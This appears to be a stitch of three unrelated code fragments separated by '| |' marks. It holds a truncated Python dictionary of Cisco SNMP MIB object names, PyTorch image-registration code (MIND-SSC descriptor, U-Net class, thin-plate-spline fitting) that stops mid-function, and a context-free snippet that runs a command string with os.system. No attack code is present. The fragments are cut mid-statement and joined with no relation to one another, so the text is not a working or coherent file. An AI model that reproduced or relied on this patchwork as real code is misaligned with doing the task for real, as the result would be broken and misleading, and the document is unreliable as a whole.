"ciscoMvpnProtocol.5.1.2": {},
"ciscoMvpnScalars": {"1": {}, "2": {}},
"ciscoNetflowMIB.1.7.1": {},
"ciscoNetflowMIB.1.7.10": {},
"ciscoNetflowMIB.1.7.11": {},
"ciscoNetflowMIB.1.7.12": {},
"ciscoNetflowMIB.1.7.13": {},
"ciscoNetflowMIB.1.7.14": {},
"ciscoNetflowMIB.1.7.15": {},
"ciscoNetflowMIB.1.7.16": {},
"ciscoNetflowMIB.1.7.17": {},
"ciscoNetflowMIB.1.7.18": {},
"ciscoNetflowMIB.1.7.19": {},
"ciscoNetflowMIB.1.7.2": {},
"ciscoNetflowMIB.1.7.20": {},
"ciscoNetflowMIB.1.7.21": {},
"ciscoNetflowMIB.1.7.22": {},
"ciscoNetflowMIB.1.7.23": {},
"ciscoNetflowMIB.1.7.24": {},
"ciscoNetflowMIB.1.7.25": {},
"ciscoNetflowMIB.1.7.26": {},
"ciscoNetflowMIB.1.7.27": {},
"ciscoNetflowMIB.1.7.28": {},
"ciscoNetflowMIB.1.7.29": {},
"ciscoNetflowMIB.1.7.3": {},
"ciscoNetflowMIB.1.7.30": {},
"ciscoNetflowMIB.1.7.31": {},
"ciscoNetflowMIB.1.7.32": {},
"ciscoNetflowMIB.1.7.33": {},
"ciscoNetflowMIB.1.7.34": {},
"ciscoNetflowMIB.1.7.35": {},
"ciscoNetflowMIB.1.7.36": {},
"ciscoNetflowMIB.1.7.37": {},
"ciscoNetflowMIB.1.7.38": {},
"ciscoNetflowMIB.1.7.4": {},
"ciscoNetflowMIB.1.7.5": {},
"ciscoNetflowMIB.1.7.6": {},
"ciscoNetflowMIB.1.7.7": {},
"ciscoNetflowMIB.10.64.8.1.10": {},
"ciscoNetflowMIB.10.64.8.1.11": {},
"ciscoNetflowMIB.10.64.8.1.12": {},
"ciscoNetflowMIB.10.64.8.1.13": {},
"ciscoNetflowMIB.10.64.8.1.14": {},
"ciscoNetflowMIB.10.64.8.1.15": {},
"ciscoNetflowMIB.10.64.8.1.16": {},
"ciscoNetflowMIB.10.64.8.1.17": {},
"ciscoNetflowMIB.10.64.8.1.18": {},
"ciscoNetflowMIB.10.64.8.1.19": {},
"ciscoNetflowMIB.10.64.8.1.2": {},
"ciscoNetflowMIB.10.64.8.1.20": {},
"ciscoNetflowMIB.10.64.8.1.21": {},
"ciscoNetflowMIB.10.64.8.1.22": {},
"ciscoNetflowMIB.10.64.8.1.23": {},
"ciscoNetflowMIB.10.64.8.1.24": {},
"ciscoNetflowMIB.10.64.8.1.25": {},
"ciscoNetflowMIB.10.64.8.1.26": {},
"ciscoNetflowMIB.10.64.8.1.3": {},
"ciscoNetflowMIB.10.64.8.1.4": {},
"ciscoNetflowMIB.10.64.8.1.5": {},
"ciscoNetflowMIB.10.64.8.1.6": {},
"ciscoNetflowMIB.10.64.8.1.7": {},
"ciscoNetflowMIB.10.64.8.1.8": {},
"ciscoNetflowMIB.10.64.8.1.9": {},
"ciscoNetflowMIB.1.7.9": {},
"ciscoPimMIBNotificationObjects": {"1": {}},
"ciscoPingEntry": {
"10": {},
"11": {},
"12": {},
"13": {},
"14": {},
"15": {},
"16": {},
"17": {},
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
"9": {},
},
"ciscoPppoeMIBObjects.10.9.1.1": {},
"ciscoProcessMIB.10.9.3.1.1": {},
"ciscoProcessMIB.10.9.3.1.10": {},
"ciscoProcessMIB.10.9.3.1.11": {},
"ciscoProcessMIB.10.9.3.1.12": {},
"ciscoProcessMIB.10.9.3.1.13": {},
"ciscoProcessMIB.10.9.3.1.14": {},
"ciscoProcessMIB.10.9.3.1.15": {},
"ciscoProcessMIB.10.9.3.1.16": {},
"ciscoProcessMIB.10.9.3.1.17": {},
"ciscoProcessMIB.10.9.3.1.18": {},
"ciscoProcessMIB.10.9.3.1.19": {},
"ciscoProcessMIB.10.9.3.1.2": {},
"ciscoProcessMIB.10.9.3.1.20": {},
"ciscoProcessMIB.10.9.3.1.21": {},
"ciscoProcessMIB.10.9.3.1.22": {},
"ciscoProcessMIB.10.9.3.1.23": {},
"ciscoProcessMIB.10.9.3.1.24": {},
"ciscoProcessMIB.10.9.3.1.25": {},
"ciscoProcessMIB.10.9.3.1.26": {},
"ciscoProcessMIB.10.9.3.1.27": {},
"ciscoProcessMIB.10.9.3.1.28": {},
"ciscoProcessMIB.10.9.3.1.29": {},
"ciscoProcessMIB.10.9.3.1.3": {},
"ciscoProcessMIB.10.9.3.1.30": {},
"ciscoProcessMIB.10.9.3.1.4": {},
"ciscoProcessMIB.10.9.3.1.5": {},
"ciscoProcessMIB.10.9.3.1.6": {},
"ciscoProcessMIB.10.9.3.1.7": {},
"ciscoProcessMIB.10.9.3.1.8": {},
"ciscoProcessMIB.10.9.3.1.9": {},
"ciscoProcessMIB.10.9.5.1": {},
"ciscoProcessMIB.10.9.5.2": {},
"ciscoSessBorderCtrlrMIBObjects": {
"73": {},
"74": {},
"75": {},
"76": {},
"77": {},
"78": {},
"79": {},
},
"ciscoSipUaMIB.10.4.7.1": {},
"ciscoSipUaMIB.10.4.7.2": {},
"ciscoSipUaMIB.10.4.7.3": {},
"ciscoSipUaMIB.10.4.7.4": {},
"ciscoSipUaMIB.10.9.10.1": {},
"ciscoSipUaMIB.10.9.10.10": {},
"ciscoSipUaMIB.10.9.10.11": {},
"ciscoSipUaMIB.10.9.10.12": {},
"ciscoSipUaMIB.10.9.10.13": {},
"ciscoSipUaMIB.10.9.10.14": {},
"ciscoSipUaMIB.10.9.10.2": {},
"ciscoSipUaMIB.10.9.10.3": {},
"ciscoSipUaMIB.10.9.10.4": {},
"ciscoSipUaMIB.10.9.10.5": {},
"ciscoSipUaMIB.10.9.10.6": {},
"ciscoSipUaMIB.10.9.10.7": {},
"ciscoSipUaMIB.10.9.10.8": {},
"ciscoSipUaMIB.10.9.10.9": {},
"ciscoSipUaMIB.10.9.9.1": {},
"ciscoSnapshotActivityEntry": {
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
},
"ciscoSnapshotInterfaceEntry": {
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
},
"ciscoSnapshotMIB.1.1": {},
"ciscoSyslogMIB.1.2.1": {},
"ciscoSyslogMIB.1.2.2": {},
"ciscoTcpConnEntry": {
"1": {},
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
"9": {},
},
"ciscoVpdnMgmtMIB.0.1": {},
"ciscoVpdnMgmtMIB.0.2": {},
"ciscoVpdnMgmtMIBObjects.10.36.1.2": {},
"ciscoVpdnMgmtMIBObjects.6.1": {},
"ciscoVpdnMgmtMIBObjects.6.2": {},
"ciscoVpdnMgmtMIBObjects.6.3": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.2": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.3": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.4": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.5": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.6": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.7": {},
"ciscoVpdnMgmtMIBObjects.6.5": {},
"ciscoVpdnMgmtMIBObjects.10.144.1.3": {},
"ciscoVpdnMgmtMIBObjects.7.1": {},
"ciscoVpdnMgmtMIBObjects.7.2": {},
"clagAggDistributionAddressMode": {},
"clagAggDistributionProtocol": {},
"clagAggPortAdminStatus": {},
"clagAggProtocolType": {},
"clispExtEidRegMoreSpecificCount": {},
"clispExtEidRegMoreSpecificLimit": {},
"clispExtEidRegMoreSpecificWarningThreshold": {},
"clispExtEidRegRlocMembershipConfigured": {},
"clispExtEidRegRlocMembershipGleaned": {},
"clispExtEidRegRlocMembershipMemberSince": {},
"clispExtFeaturesEidRegMoreSpecificLimit": {},
"clispExtFeaturesEidRegMoreSpecificWarningThreshold": {},
"clispExtFeaturesMapCacheWarningThreshold": {},
"clispExtGlobalStatsEidRegMoreSpecificEntryCount": {},
"clispExtReliableTransportSessionBytesIn": {},
"clispExtReliableTransportSessionBytesOut": {},
"clispExtReliableTransportSessionEstablishmentRole": {},
"clispExtReliableTransportSessionLastStateChangeTime": {},
"clispExtReliableTransportSessionMessagesIn": {},
"clispExtReliableTransportSessionMessagesOut": {},
"clispExtReliableTransportSessionState": {},
"clispExtRlocMembershipConfigured": {},
"clispExtRlocMembershipDiscovered": {},
"clispExtRlocMembershipMemberSince": {},
"clogBasic": {"1": {}, "2": {}, "3": {}, "4": {}, "5": {}},
"clogHistoryEntry": {"2": {}, "3": {}, "4": {}, "5": {}, "6": {}},
"cmiFaAdvertChallengeChapSPI": {},
"cmiFaAdvertChallengeValue": {},
"cmiFaAdvertChallengeWindow": {},
"cmiFaAdvertIsBusy": {},
"cmiFaAdvertRegRequired": {},
"cmiFaChallengeEnable": {},
"cmiFaChallengeSupported": {},
"cmiFaCoaInterfaceOnly": {},
"cmiFaCoaRegAsymLink": {},
"cmiFaCoaTransmitOnly": {},
"cmiFaCvsesFromHaRejected": {},
"cmiFaCvsesFromMnRejected": {},
"cmiFaDeRegRepliesValidFromHA": {},
"cmiFaDeRegRepliesValidRelayToMN": {},
"cmiFaDeRegRequestsDenied": {},
"cmiFaDeRegRequestsDiscarded": {},
"cmiFaDeRegRequestsReceived": {},
"cmiFaDeRegRequestsRelayed": {},
"cmiFaDeliveryStyleUnsupported": {},
"cmiFaEncapDeliveryStyleSupported": {},
"cmiFaInitRegRepliesValidFromHA": {},
"cmiFaInitRegRepliesValidRelayMN": {},
"cmiFaInitRegRequestsDenied": {},
"cmiFaInitRegRequestsDiscarded": {},
"cmiFaInitRegRequestsReceived": {},
"cmiFaInitRegRequestsRelayed": {},
"cmiFaMissingChallenge": {},
"cmiFaMnAAAAuthFailures": {},
"cmiFaMnFaAuthFailures": {},
"cmiFaMnTooDistant": {},
"cmiFaNvsesFromHaNeglected": {},
"cmiFaNvsesFromMnNeglected": {},
"cmiFaReRegRepliesValidFromHA": {},
"cmiFaReRegRepliesValidRelayToMN": {},
"cmiFaReRegRequestsDenied": {},
"cmiFaReRegRequestsDiscarded": {},
"cmiFaReRegRequestsReceived": {},
"cmiFaReRegRequestsRelayed": {},
"cmiFaRegTotalVisitors": {},
"cmiFaRegVisitorChallengeValue": {},
"cmiFaRegVisitorHomeAddress": {},
"cmiFaRegVisitorHomeAgentAddress": {},
"cmiFaRegVisitorRegFlags": {},
"cmiFaRegVisitorRegFlagsRev1": {},
"cmiFaRegVisitorRegIDHigh": {},
"cmiFaRegVisitorRegIDLow": {},
"cmiFaRegVisitorRegIsAccepted": {},
"cmiFaRegVisitorTimeGranted": {},
"cmiFaRegVisitorTimeRemaining": {},
"cmiFaRevTunnelSupported": {},
"cmiFaReverseTunnelBitNotSet": {},
"cmiFaReverseTunnelEnable": {},
"cmiFaReverseTunnelUnavailable": {},
"cmiFaStaleChallenge": {},
"cmiFaTotalRegReplies": {},
"cmiFaTotalRegRequests": {},
"cmiFaUnknownChallenge": {},
"cmiHaCvsesFromFaRejected": {},
"cmiHaCvsesFromMnRejected": {},
"cmiHaDeRegRequestsAccepted": {},
"cmiHaDeRegRequestsDenied": {},
"cmiHaDeRegRequestsDiscarded": {},
"cmiHaDeRegRequestsReceived": {},
"cmiHaEncapUnavailable": {},
"cmiHaEncapsulationUnavailable": {},
"cmiHaInitRegRequestsAccepted": {},
"cmiHaInitRegRequestsDenied": {},
"cmiHaInitRegRequestsDiscarded": {},
"cmiHaInitRegRequestsReceived": {},
"cmiHaMnAAAAuthFailures": {},
"cmiHaMnHaAuthFailures": {},
"cmiHaMobNetDynamic": {},
"cmiHaMobNetStatus": {},
"cmiHaMrDynamic": {},
"cmiHaMrMultiPath": {},
"cmiHaMrMultiPathMetricType": {},
"cmiHaMrStatus": {},
"cmiHaNAICheckFailures": {},
"cmiHaNvsesFromFaNeglected": {},
"cmiHaNvsesFromMnNeglected": {},
"cmiHaReRegRequestsAccepted": {},
"cmiHaReRegRequestsDenied": {},
"cmiHaReRegRequestsDiscarded": {},
"cmiHaReRegRequestsReceived": {},
"cmiHaRedunDroppedBIAcks": {},
"cmiHaRedunDroppedBIReps": {},
"cmiHaRedunFailedBIReps": {},
"cmiHaRedunFailedBIReqs": {},
"cmiHaRedunFailedBUs": {},
"cmiHaRedunReceivedBIAcks": {},
"cmiHaRedunReceivedBIReps": {},
"cmiHaRedunReceivedBIReqs": {},
"cmiHaRedunReceivedBUAcks": {},
"cmiHaRedunReceivedBUs": {},
"cmiHaRedunSecViolations": {},
"cmiHaRedunSentBIAcks": {},
"cmiHaRedunSentBIReps": {},
"cmiHaRedunSentBIReqs": {},
"cmiHaRedunSentBUAcks": {},
"cmiHaRedunSentBUs": {},
"cmiHaRedunTotalSentBIReps": {},
"cmiHaRedunTotalSentBIReqs": {},
"cmiHaRedunTotalSentBUs": {},
"cmiHaRegAvgTimeRegsProcByAAA": {},
"cmiHaRegDateMaxRegsProcByAAA": {},
"cmiHaRegDateMaxRegsProcLoc": {},
"cmiHaRegMaxProcByAAAInMinRegs": {},
"cmiHaRegMaxProcLocInMinRegs": {},
"cmiHaRegMaxTimeRegsProcByAAA": {},
"cmiHaRegMnIdentifier": {},
"cmiHaRegMnIdentifierType": {},
"cmiHaRegMnIfBandwidth": {},
"cmiHaRegMnIfDescription": {},
"cmiHaRegMnIfID": {},
"cmiHaRegMnIfPathMetricType": {},
"cmiHaRegMobilityBindingRegFlags": {},
"cmiHaRegOverallServTime": {},
"cmiHaRegProcAAAInLastByMinRegs": {},
"cmiHaRegProcLocInLastMinRegs": {},
"cmiHaRegRecentServAcceptedTime": {},
"cmiHaRegRecentServDeniedCode": {},
"cmiHaRegRecentServDeniedTime": {},
"cmiHaRegRequestsDenied": {},
"cmiHaRegRequestsDiscarded": {},
"cmiHaRegRequestsReceived": {},
"cmiHaRegServAcceptedRequests": {},
"cmiHaRegServDeniedRequests": {},
"cmiHaRegTotalMobilityBindings": {},
"cmiHaRegTotalProcByAAARegs": {},
"cmiHaRegTotalProcLocRegs": {},
"cmiHaReverseTunnelBitNotSet": {},
"cmiHaReverseTunnelUnavailable": {},
"cmiHaSystemVersion": {},
"cmiMRIfDescription": {},
"cmiMaAdvAddress": {},
"cmiMaAdvAddressType": {},
"cmiMaAdvMaxAdvLifetime": {},
"cmiMaAdvMaxInterval": {},
"cmiMaAdvMaxRegLifetime": {},
"cmiMaAdvMinInterval": {},
"cmiMaAdvPrefixLengthInclusion": {},
"cmiMaAdvResponseSolicitationOnly": {},
"cmiMaAdvStatus": {},
"cmiMaInterfaceAddress": {},
"cmiMaInterfaceAddressType": {},
"cmiMaRegDateMaxRegsReceived": {},
"cmiMaRegInLastMinuteRegs": {},
"cmiMaRegMaxInMinuteRegs": {},
"cmiMnAdvFlags": {},
"cmiMnRegFlags": {},
"cmiMrBetterIfDetected": {},
"cmiMrCollocatedTunnel": {},
"cmiMrHABest": {},
"cmiMrHAPriority": {},
"cmiMrHaTunnelIfIndex": {},
"cmiMrIfCCoaAddress": {},
"cmiMrIfCCoaAddressType": {},
"cmiMrIfCCoaDefaultGw": {},
"cmiMrIfCCoaDefaultGwType": {},
"cmiMrIfCCoaEnable": {},
"cmiMrIfCCoaOnly": {},
"cmiMrIfCCoaRegRetry": {},
"cmiMrIfCCoaRegRetryRemaining": {},
"cmiMrIfCCoaRegistration": {},
"cmiMrIfHaTunnelIfIndex": {},
"cmiMrIfHoldDown": {},
"cmiMrIfID": {},
"cmiMrIfRegisteredCoA": {},
"cmiMrIfRegisteredCoAType": {},
"cmiMrIfRegisteredMaAddr": {},
"cmiMrIfRegisteredMaAddrType": {},
"cmiMrIfRoamPriority": {},
"cmiMrIfRoamStatus": {},
"cmiMrIfSolicitInterval": {},
"cmiMrIfSolicitPeriodic": {},
"cmiMrIfSolicitRetransCount": {},
"cmiMrIfSolicitRetransCurrent": {},
"cmiMrIfSolicitRetransInitial": {},
"cmiMrIfSolicitRetransLimit": {},
"cmiMrIfSolicitRetransMax": {},
"cmiMrIfSolicitRetransRemaining": {},
"cmiMrIfStatus": {},
"cmiMrMaAdvFlags": {},
"cmiMrMaAdvLifetimeRemaining": {},
"cmiMrMaAdvMaxLifetime": {},
"cmiMrMaAdvMaxRegLifetime": {},
"cmiMrMaAdvRcvIf": {},
"cmiMrMaAdvSequence": {},
"cmiMrMaAdvTimeFirstHeard": {},
"cmiMrMaAdvTimeReceived": {},
"cmiMrMaHoldDownRemaining": {},
"cmiMrMaIfMacAddress": {},
"cmiMrMaIsHa": {},
"cmiMrMobNetAddr": {},
"cmiMrMobNetAddrType": {},
"cmiMrMobNetPfxLen": {},
"cmiMrMobNetStatus": {},
"cmiMrMultiPath": {},
"cmiMrMultiPathMetricType": {},
"cmiMrRedStateActive": {},
"cmiMrRedStatePassive": {},
"cmiMrRedundancyGroup": {},
"cmiMrRegExtendExpire": {},
"cmiMrRegExtendInterval": {},
"cmiMrRegExtendRetry": {},
"cmiMrRegLifetime": {},
"cmiMrRegNewHa": {},
"cmiMrRegRetransInitial": {},
"cmiMrRegRetransLimit": {},
"cmiMrRegRetransMax": {},
"cmiMrReverseTunnel": {},
"cmiMrTunnelBytesRcvd": {},
"cmiMrTunnelBytesSent": {},
"cmiMrTunnelPktsRcvd": {},
"cmiMrTunnelPktsSent": {},
"cmiNtRegCOA": {},
"cmiNtRegCOAType": {},
"cmiNtRegDeniedCode": {},
"cmiNtRegHAAddrType": {},
"cmiNtRegHomeAddress": {},
"cmiNtRegHomeAddressType": {},
"cmiNtRegHomeAgent": {},
"cmiNtRegNAI": {},
"cmiSecAlgorithmMode": {},
"cmiSecAlgorithmType": {},
"cmiSecAssocsCount": {},
"cmiSecKey": {},
"cmiSecKey2": {},
"cmiSecRecentViolationIDHigh": {},
"cmiSecRecentViolationIDLow": {},
"cmiSecRecentViolationReason": {},
"cmiSecRecentViolationSPI": {},
"cmiSecRecentViolationTime": {},
"cmiSecReplayMethod": {},
"cmiSecStatus": {},
"cmiSecTotalViolations": {},
"cmiTrapControl": {},
"cmplsFrrConstEntry": {
"10": {},
"11": {},
"12": {},
"13": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
"9": {},
},
"cmplsFrrFacRouteDBEntry": {"7": {}, "8": {}, "9": {}},
"cmplsFrrMIB.1.1": {},
"cmplsFrrMIB.1.10": {},
"cmplsFrrMIB.1.11": {},
"cmplsFrrMIB.1.12": {},
"cmplsFrrMIB.1.13": {},
"cmplsFrrMIB.1.14": {},
"cmplsFrrMIB.1.2": {},
"cmplsFrrMIB.1.3": {},
"cmplsFrrMIB.1.4": {},
"cmplsFrrMIB.1.5": {},
"cmplsFrrMIB.1.6": {},
"cmplsFrrMIB.1.7": {},
"cmplsFrrMIB.1.8": {},
"cmplsFrrMIB.1.9": {},
"cmplsFrrMIB.10.9.2.1.2": {},
"cmplsFrrMIB.10.9.2.1.3": {},
"cmplsFrrMIB.10.9.2.1.4": {},
"cmplsFrrMIB.10.9.2.1.5": {},
"cmplsFrrMIB.10.9.2.1.6": {},
"cmplsNodeConfigGlobalId": {},
"cmplsNodeConfigIccId": {},
"cmplsNodeConfigNodeId": {},
"cmplsNodeConfigRowStatus": {},
"cmplsNodeConfigStorageType": {},
"cmplsNodeIccMapLocalId": {},
"cmplsNodeIpMapLocalId": {},
"cmplsTunnelExtDestTnlIndex": {},
"cmplsTunnelExtDestTnlLspIndex": {},
"cmplsTunnelExtDestTnlValid": {},
"cmplsTunnelExtOppositeDirTnlValid": {},
"cmplsTunnelOppositeDirPtr": {},
"cmplsTunnelReversePerfBytes": {},
"cmplsTunnelReversePerfErrors": {},
"cmplsTunnelReversePerfHCBytes": | |
import nibabel as nib
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import matplotlib.pyplot as plt
import os
import math
import struct
import csv
import time
def gpu_usage():
print('gpu usage (current/max): {:.2f} / {:.2f} GB'.format(torch.cuda.memory_allocated()*1e-9, torch.cuda.max_memory_allocated()*1e-9))
def pdist_squared(x):
xx = (x**2).sum(dim=1).unsqueeze(2)
yy = xx.permute(0, 2, 1)
dist = xx + yy - 2.0 * torch.bmm(x.permute(0, 2, 1), x)
dist[dist != dist] = 0
dist = torch.clamp(dist, 0.0, np.inf)
return dist
def MINDSSC(img, radius=2, dilation=2):
# see http://mpheinrich.de/pub/miccai2013_943_mheinrich.pdf for details on the MIND-SSC descriptor
# kernel size
kernel_size = radius * 2 + 1
# define start and end locations for self-similarity pattern
six_neighbourhood = torch.Tensor([[0,1,1],
[1,1,0],
[1,0,1],
[1,1,2],
[2,1,1],
[1,2,1]]).long()
# squared distances
dist = pdist_squared(six_neighbourhood.t().unsqueeze(0)).squeeze(0)
# define comparison mask
x, y = torch.meshgrid(torch.arange(6), torch.arange(6),indexing='ij')
mask = ((x > y).view(-1) & (dist == 2).view(-1))
# build kernel
idx_shift1 = six_neighbourhood.unsqueeze(1).repeat(1,6,1).view(-1,3)[mask,:]
idx_shift2 = six_neighbourhood.unsqueeze(0).repeat(6,1,1).view(-1,3)[mask,:]
mshift1 = torch.zeros(12, 1, 3, 3, 3).cuda()
mshift1.view(-1)[torch.arange(12) * 27 + idx_shift1[:,0] * 9 + idx_shift1[:, 1] * 3 + idx_shift1[:, 2]] = 1
mshift2 = torch.zeros(12, 1, 3, 3, 3).cuda()
mshift2.view(-1)[torch.arange(12) * 27 + idx_shift2[:,0] * 9 + idx_shift2[:, 1] * 3 + idx_shift2[:, 2]] = 1
rpad1 = nn.ReplicationPad3d(dilation)
rpad2 = nn.ReplicationPad3d(radius)
# compute patch-ssd
ssd = F.avg_pool3d(rpad2((F.conv3d(rpad1(img), mshift1, dilation=dilation) - F.conv3d(rpad1(img), mshift2, dilation=dilation)) ** 2), kernel_size, stride=1)
# MIND equation
mind = ssd - torch.min(ssd, 1, keepdim=True)[0]
mind_var = torch.mean(mind, 1, keepdim=True)
mind_var = torch.clamp(mind_var, mind_var.mean()*0.001, mind_var.mean()*1000)
mind /= mind_var
mind = torch.exp(-mind)
#permute to have same ordering as C++ code
mind = mind[:, torch.Tensor([6, 8, 1, 11, 2, 10, 0, 7, 9, 4, 5, 3]).long(), :, :, :]
return mind
def mind_loss(x, y):
return torch.mean( (MINDSSC(x) - MINDSSC(y)) ** 2 )
def pdist(x, p=2):
if p==1:
dist = torch.abs(x.unsqueeze(2) - x.unsqueeze(1)).sum(dim=2)
elif p==2:
xx = (x**2).sum(dim=2).unsqueeze(2)
yy = xx.permute(0, 2, 1)
dist = xx + yy - 2.0 * torch.bmm(x, x.permute(0, 2, 1))
dist[:, torch.arange(dist.shape[1]), torch.arange(dist.shape[2])] = 0
return dist
def pdist2(x, y, p=2):
if p==1:
dist = torch.abs(x.unsqueeze(2) - y.unsqueeze(1)).sum(dim=3)
elif p==2:
xx = (x**2).sum(dim=2).unsqueeze(2)
yy = (y**2).sum(dim=2).unsqueeze(1)
dist = xx + yy - 2.0 * torch.bmm(x, y.permute(0, 2, 1))
return dist
def knn_graph(kpts, k, include_self=False):
B, N, D = kpts.shape
device = kpts.device
dist = pdist(kpts)
ind = (-dist).topk(k + (1 - int(include_self)), dim=-1)[1][:, :, 1 - int(include_self):]
A = torch.zeros(B, N, N).to(device)
A[:, torch.arange(N).repeat(k), ind[0].t().contiguous().view(-1)] = 1
A[:, ind[0].t().contiguous().view(-1), torch.arange(N).repeat(k)] = 1
return ind, dist*A, A
def laplacian(kpts, k, lambd, sigma=0):
_, dist, A = knn_graph(kpts, k)
W = lambd * A.squeeze(0)
if sigma > 0:
W = W * torch.exp(- dist.squeeze(0) / (sigma ** 2))
return (torch.diag(W.sum(1) + 1) - W).unsqueeze(0), W.unsqueeze(0)
def dice_coeff(outputs, labels, max_label):
dice = torch.FloatTensor(max_label-1).fill_(0)
for label_num in range(1, max_label):
iflat = (outputs==label_num).view(-1).float()
tflat = (labels==label_num).view(-1).float()
intersection = torch.mean(iflat * tflat)
dice[label_num-1] = (2. * intersection) / (1e-8 + torch.mean(iflat) + torch.mean(tflat))
return dice
def default_unet_features():
nb_features = [[32, 48, 48, 64], # encoder
[64, 48, 48, 48, 48, 32, 64]] #decoder
return nb_features
class Unet(nn.Module):
"""
A unet architecture. Layer features can be specified directly as a list of encoder and decoder
features or as a single integer along with a number of unet levels. The default network features
per layer (when no options are specified) are:
encoder: [16, 32, 32, 32]
decoder: [32, 32, 32, 32, 32, 16, 16]
"""
def __init__(self,ConvBlock,
inshape=None,
infeats=None,
nb_features=None,
nb_levels=None,
max_pool=2,
feat_mult=1,
nb_conv_per_level=1,
half_res=False):
"""
Parameters:
inshape: Input shape. e.g. (192, 192, 192)
infeats: Number of input features.
nb_features: Unet convolutional features. Can be specified via a list of lists with
the form [[encoder feats], [decoder feats]], or as a single integer.
If None (default), the unet features are defined by the default config described in
the class documentation.
nb_levels: Number of levels in unet. Only used when nb_features is an integer.
Default is None.
feat_mult: Per-level feature multiplier. Only used when nb_features is an integer.
Default is 1.
nb_conv_per_level: Number of convolutions per unet level. Default is 1.
half_res: Skip the last decoder upsampling. Default is False.
"""
super().__init__()
# ensure correct dimensionality
ndims = len(inshape)
assert ndims in [1, 2, 3], 'ndims should be one of 1, 2, or 3. found: %d' % ndims
# cache some parameters
self.half_res = half_res
# default encoder and decoder layer features if nothing provided
if nb_features is None:
nb_features = default_unet_features()
# build feature list automatically
if isinstance(nb_features, int):
if nb_levels is None:
raise ValueError('must provide unet nb_levels if nb_features is an integer')
feats = np.round(nb_features * feat_mult ** np.arange(nb_levels)).astype(int)
nb_features = [
np.repeat(feats[:-1], nb_conv_per_level),
np.repeat(np.flip(feats), nb_conv_per_level)
]
elif nb_levels is not None:
raise ValueError('cannot use nb_levels if nb_features is not an integer')
# extract any surplus (full resolution) decoder convolutions
enc_nf, dec_nf = nb_features
nb_dec_convs = len(enc_nf)
final_convs = dec_nf[nb_dec_convs:]
dec_nf = dec_nf[:nb_dec_convs]
self.nb_levels = int(nb_dec_convs / nb_conv_per_level) + 1
if isinstance(max_pool, int):
max_pool = [max_pool] * self.nb_levels
# cache downsampling / upsampling operations
MaxPooling = getattr(nn, 'MaxPool%dd' % ndims)
self.pooling = [MaxPooling(s) for s in max_pool]
self.upsampling = [nn.Upsample(scale_factor=s, mode='nearest') for s in max_pool]
# configure encoder (down-sampling path)
prev_nf = infeats
encoder_nfs = [prev_nf]
self.encoder = nn.ModuleList()
for level in range(self.nb_levels - 1):
convs = nn.ModuleList()
for conv in range(nb_conv_per_level):
nf = enc_nf[level * nb_conv_per_level + conv]
convs.append(ConvBlock(ndims, prev_nf, nf))
prev_nf = nf
self.encoder.append(convs)
encoder_nfs.append(prev_nf)
# configure decoder (up-sampling path)
encoder_nfs = np.flip(encoder_nfs)
self.decoder = nn.ModuleList()
for level in range(self.nb_levels - 1):
convs = nn.ModuleList()
for conv in range(nb_conv_per_level):
nf = dec_nf[level * nb_conv_per_level + conv]
convs.append(ConvBlock(ndims, prev_nf, nf))
prev_nf = nf
self.decoder.append(convs)
if not half_res or level < (self.nb_levels - 2):
prev_nf += encoder_nfs[level]
# now we take care of any remaining convolutions
self.remaining = nn.ModuleList()
for num, nf in enumerate(final_convs):
self.remaining.append(ConvBlock(ndims, prev_nf, nf))
prev_nf = nf
# cache final number of features
self.final_nf = prev_nf
def forward(self, x):
# encoder forward pass
x_history = [x]
for level, convs in enumerate(self.encoder):
for conv in convs:
x = conv(x)
x_history.append(x)
x = self.pooling[level](x)
# decoder forward pass with upsampling and concatenation
for level, convs in enumerate(self.decoder):
for conv in convs:
x = conv(x)
if not self.half_res or level < (self.nb_levels - 2):
x = self.upsampling[level](x)
x = torch.cat([x, x_history.pop()], dim=1)
# remaining convs at full resolution
for conv in self.remaining:
x = conv(x)
return x
def countParameters(model):
model_parameters = filter(lambda p: p.requires_grad, model.parameters())
params = sum([np.prod(p.size()) for p in model_parameters])
return params
class TPS:
@staticmethod
def fit(c, f, lambd=0.):
device = c.device
n = c.shape[0]
f_dim = f.shape[1]
U = TPS.u(TPS.d(c, c))
K = U + torch.eye(n, device=device) * lambd
P = torch.ones((n, 4), device=device)
P[:, 1:] = c
v = torch.zeros((n+4, f_dim), device=device)
v[:n, :] = f
A = torch.zeros((n+4, n+4), device=device)
A[:n, :n] = K
A[:n, -4:] = P
A[-4:, :n] = P.t()
theta = torch.linalg.solve(A,v)
#theta = torch.solve(v, A)[0]
return theta
@staticmethod
def d(a, b):
ra = (a**2).sum(dim=1).view(-1, 1)
rb = (b**2).sum(dim=1).view(1, -1)
dist = ra + rb - 2.0 * torch.mm(a, b.permute(1, 0))
dist.clamp_(0.0, float('inf'))
return torch.sqrt(dist)
@staticmethod
def u(r):
return (r**2) * torch.log(r + 1e-6)
@staticmethod
def z(x, c, theta):
U = TPS.u(TPS.d(x, c))
w, a = theta[:-4], theta[-4:].unsqueeze(2)
b = torch.matmul(U, w)
return (a[0] + a[1] * x[:, 0] + a[2] * x[:, 1] + a[3] * x[:, 2] + b.t()).t()
def thin_plate_dense(x1, y1, shape, step, lambd=.0, unroll_step_size=2**12):
device = x1.device
D, H, W = shape
D1, H1, W1 = D//step, H//step, W//step
x2 = F.affine_grid(torch.eye(3, 4, device=device).unsqueeze(0), (1, 1, D1, H1, W1), align_corners=True).view(-1, 3)
tps = TPS()
theta = tps.fit(x1[0], y1[0], lambd)
y2 = torch.zeros((1, D1 * H1 * W1, 3), device=device)
N = D1*H1*W1
n = math.ceil(N/unroll_step_size)
for j in range(n):
j1 = j * unroll_step_size
j2 = min((j + 1) * unroll_step_size, N)
y2[0, j1:j2, :] = tps.z(x2[j1:j2], x1[0], theta)
| |
ck.out(y)
ck.out('')
ry=os.system(y)
